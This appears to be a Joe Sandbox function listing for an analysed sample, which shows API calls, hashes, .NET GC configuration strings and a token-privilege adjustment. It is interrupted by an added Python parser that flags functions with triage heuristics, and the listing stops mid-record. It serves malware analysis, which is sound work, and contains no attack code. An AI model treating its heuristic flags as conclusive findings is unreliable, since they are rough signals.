                            • Opcode ID: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                            • Instruction ID: 69c8802d277f8c60e643973a4137293dda7dff8e8b0e12973e5873cb9efb96b8
                            • Opcode Fuzzy Hash: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                            • Instruction Fuzzy Hash: 8941B563A39A42D5EB10AF2BA880675A360EF45BF8FA54335DA3C576D5CF2DE041C360
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                            • Instruction ID: 117277565ddb7d6d146c26fb3075ecbce03523d97ee835a38ef23cc4f04b9327
                            • Opcode Fuzzy Hash: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                            • Instruction Fuzzy Hash: 9631E433B25B12C2E614EF27958052AA3A0EB45FD4FA48135EF4C17BE4EF78E4628350
                            APIs
                              • Part of subcall function 00007FF774A129C0: VirtualFree.KERNELBASE ref: 00007FF774A129CA
                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF774A266E9,?,?,?,00007FF774A2C70D), ref: 00007FF774A40662
                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF774A266E9,?,?,?,00007FF774A2C70D), ref: 00007FF774A4068C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterFreeLeaveVirtual
                            • String ID:
                            • API String ID: 1320683145-0
                            • Opcode ID: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                            • Instruction ID: beba8af09d7dd64c63aab8e2218d15d8488c3bf65457ed241636683415543f8f
                            • Opcode Fuzzy Hash: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                            • Instruction Fuzzy Hash: 74F06D23D3C602D0E650AF1AF9C06B9A2B0EB453D4F9A8132D95D129A58E3CE851C320
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                            • Instruction ID: 45dc2d42ac9ebcddbfccb65da1d80603c84242f1b75c2749cd2bda5fa461818e
                            • Opcode Fuzzy Hash: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                            • Instruction Fuzzy Hash: 61E08C26F3A101C2FA18AB2BA882A3463A16F59B40FD4C038C60D42360DE2DA55A9B61
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: BreakDebug
                            • String ID:
                            • API String ID: 456121617-0
                            • Opcode ID: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                            • Instruction ID: 23b52c86a66687c804a7279bafd17cd9ab0d133d65250b9c63589b777604943a
                            • Opcode Fuzzy Hash: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                            • Instruction Fuzzy Hash: C541D467F38642C2F650AE1394819B5A3B1AB887A4FA55632DA2E537C5DF3CE841C350
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ExceptionFailFastQueryRaiseVirtual
                            • String ID:
                            • API String ID: 3307674043-0
                            • Opcode ID: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                            • Instruction ID: 7b19148b4d21bfb2a41eec79118b93ee1d2584ffd94403d5c2ba0863fa9dcef8
                            • Opcode Fuzzy Hash: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                            • Instruction Fuzzy Hash: 32118C73A28781D2DA24AF26B44459AB350FB447B4FA54339EABE477D6DF38D0028711
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                            • Instruction ID: 8289d197f098e4313e8f31512eb71dc0e860f75ff3322d274be8838c1bdde109
                            • Opcode Fuzzy Hash: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                            • Instruction Fuzzy Hash: 3AB01200F3A001C2E3043B237CC2B3C13143F09B12FC40024C708A1360CE1C85E53B21
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCWriteBarrier$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                            • API String ID: 0-658696054
                            • Opcode ID: ecde77bb0a1b3d580a77b2a7b2ab0705610edb5cdae39382ac81189c20de0c64
                            • Instruction ID: 3eb344a75424fd08a8f89dd1772a1d54f8b5f870c1a0e6c451281cd162493a4e
                            • Opcode Fuzzy Hash: ecde77bb0a1b3d580a77b2a7b2ab0705610edb5cdae39382ac81189c20de0c64
                            • Instruction Fuzzy Hash: 87325262638A5BD1EB20AF16F990A79A364FF597C8F815133D98C07B24EF7CD2018725
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                            • API String ID: 0-2080704861
                            • Opcode ID: 13c2ff06cb6ee55de0b396958020aa07f0a51e79af96dec23aaa6c9b6e43138c
                            • Instruction ID: f43eade4f6167e4a9710588418ac737832a414ba7b1c6419f0987b82154d3929
                            • Opcode Fuzzy Hash: 13c2ff06cb6ee55de0b396958020aa07f0a51e79af96dec23aaa6c9b6e43138c
                            • Instruction Fuzzy Hash: D9F18E62D79947E1F600FF67E9D58F4A7A6AF99304BC58033D00D520B6AE7CA249C371
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                            • String ID: SeLockMemoryPrivilege
                            • API String ID: 1752251271-475654710
                            • Opcode ID: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                            • Instruction ID: 7f8f838ef297cb180895f80de2cab28762bc4370f13c414061a0172b33b06fd5
                            • Opcode Fuzzy Hash: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                            • Instruction Fuzzy Hash: 2A318323A3DA42C6FB20AF62A88467AA7B1FF94B88F904035DA4D47764DF3CD4448760
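Every function in this listing is rendered with the same fixed fields (an `APIs` and a `Strings` heading, the memory-dump source and its associated dumps, then the `API ID`, `String ID`, `API String ID`, opcode and instruction hashes). That regularity makes the listing easy to mine in bulk, for example to pull out the function above that looks up `SeLockMemoryPrivilege` and adjusts token privileges before a large-page allocation. The following Python is an added example, not code from Joe Sandbox or from this report: it parses the rendered blocks into records and applies its own triage heuristics. `SAMPLE` is a constructed excerpt in this report's layout (its second record combines fields that appear in separate records on the page), the rule that a record ends at its `Instruction Fuzzy Hash` line is an assumption about the rendered layout, and the flag names in `flag()` are this example's own, not Joe Sandbox signatures.

```python
"""Parse the per-function blocks of a Joe Sandbox 'Execution Graph' listing
and flag functions worth a manual look.

Added example, not part of the Joe Sandbox report. SAMPLE is a constructed
excerpt; the record-boundary rule and the heuristics in flag() are this
example's own assumptions, not documented Joe Sandbox behaviour.
"""
import re
from dataclasses import dataclass, field

ID_KEYS = {"API ID", "String ID", "API String ID", "Opcode ID",
           "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}
API_CALL_RE = re.compile(r"^(?P<name>[\w.]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-Fa-f]+)$")
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")
PRIV_NAME_RE = re.compile(r"\bSe[A-Za-z]+Privilege\b")   # Windows privilege constant names

@dataclass
class ApiCall:
    name: str   # e.g. "RaiseFailFastException.KERNEL32"
    args: str   # argument list exactly as the report renders it
    ref: int    # call-site address taken from "ref:"

@dataclass
class FunctionRecord:
    source_file: str = ""
    offset: int = 0                               # module base from "Offset:" (0 if absent)
    associated: list = field(default_factory=list)
    ids: dict = field(default_factory=dict)       # "API ID", "String ID", ... as rendered
    api_calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # (text, xref address)

def parse(text: str) -> list:
    records, cur, section = [], FunctionRecord(), ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("• "):
            section = line                         # bare line = heading (APIs, Strings, ...)
            continue
        body = line[2:]
        key, sep, value = body.partition(": ")
        if not sep and body.endswith(":"):          # e.g. "API ID:" with an empty value
            key, value = body[:-1].strip(), ""
        if key == "Source File":
            cur.source_file = value.split(",", 1)[0]
            m = OFFSET_RE.search(value)
            cur.offset = int(m.group(1), 16) if m else 0
        elif key == "Associated":
            # The rendered page fuses the "Download File" link label onto the dump name.
            cur.associated.append(value.removesuffix("Download File").strip())
        elif key in ID_KEYS:
            cur.ids[key] = value.strip()
            if key == "Instruction Fuzzy Hash":     # last field of a record (assumption)
                records.append(cur)
                cur = FunctionRecord()
        elif section == "APIs" and (m := API_CALL_RE.match(body)):
            cur.api_calls.append(ApiCall(m["name"], m["args"], int(m["ref"], 16)))
        elif section == "Strings" and (m := STRING_RE.match(body)):
            cur.strings.append((m["text"], int(m["xref"], 16)))
    return records

def api_tokens(api_id: str) -> set:
    """Split the '$'-joined CamelCase 'API ID' into its word tokens."""
    return {t for part in api_id.split("$")
            for t in re.findall(r"[A-Z][a-z0-9]*|[a-z0-9]+", part)}

def flag(rec: FunctionRecord) -> list:
    """Triage heuristics of this example (not Joe Sandbox signatures)."""
    toks, hits = api_tokens(rec.ids.get("API ID", "")), []
    if {"Adjust", "Privileges"} <= toks:            # AdjustTokenPrivileges-style call set
        hits.append("token-privilege-adjust")
    m = PRIV_NAME_RE.search(rec.ids.get("String ID", ""))
    if m:
        hits.append("names-privilege:" + m.group(0))
    if {"Large", "Page", "Minimum"} <= toks:        # GetLargePageMinimum-style call set
        hits.append("large-pages")
    if {"Fail", "Fast", "Raise"} <= toks or any(
            c.name.startswith("RaiseFailFastException") for c in rec.api_calls):
        hits.append("fail-fast")
    return hits

# Constructed excerpt in the report's rendered layout (two function records).
SAMPLE = """\
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
• Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
• String ID: SeLockMemoryPrivilege
• Instruction Fuzzy Hash: 2A318323A3DA42C6FB20AF62A88467AA7B1FF94B88F904035DA4D47764DF3CD4448760
APIs
• RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A0813B
Strings
• The required instruction sets are not supported by the current CPU., xrefs: 00007FF774A0570E
Memory Dump Source
• Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
Similarity
• API ID: ExceptionFailFastRaise
• String ID: [ KeepUnwinding ]
• Instruction Fuzzy Hash: 92C18273A29B41C1EB549F36D4C4AA97360FB44B48FA9413ACE4D073A8EF39D455C324
"""

if __name__ == "__main__":
    for rec in parse(SAMPLE):
        print(hex(rec.offset), rec.ids.get("String ID"), flag(rec))
```

Feeding the whole listing to `parse()` and sorting by `flag()` output gives a quick shortlist; the `Instruction Fuzzy Hash` values it keeps can then be compared across reports of related samples.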
                            APIs
                            • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A0813B
                            • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A0829A
                            • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A08390
                            • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A083A6
                            • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF774A08A70,?,?,?,?,?,?,?,?,?), ref: 00007FF774A08406
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise
                            • String ID: [ KeepUnwinding ]
                            • API String ID: 2546344036-400895726
                            • Opcode ID: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                            • Instruction ID: 8a23f5dc53e932a040d31cd384a2287e2c31e225a5c1bbd881b2ee7cff7f1944
                            • Opcode Fuzzy Hash: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                            • Instruction Fuzzy Hash: 92C18273A29B41C1EB549F36D4C4AA97360FB44B48FA9413ACE4D073A8EF39D455C324
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                            • String ID:
                            • API String ID: 2933794660-0
                            • Opcode ID: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                            • Instruction ID: b17159b3231ec46167350ff4bcef608543dcc3313e6615fa65b130ced16902d5
                            • Opcode Fuzzy Hash: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                            • Instruction Fuzzy Hash: D4114826B38B01CAEB00DF61EC942B873A4FB19B98F840A31DA6D827A4DF78D5548350
                            APIs
                            Strings
                            • The required instruction sets are not supported by the current CPU., xrefs: 00007FF774A0570E
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise
                            • String ID: The required instruction sets are not supported by the current CPU.
                            • API String ID: 2546344036-3318624164
                            • Opcode ID: ab07537777515488e9e8f57eef12ca18558389b5460dfc982353195e4352bf6a
                            • Instruction ID: acf963d2e536ad29e5ed09acc5f2e96c2b5af1f666d7adbaa269212f017bb8c0
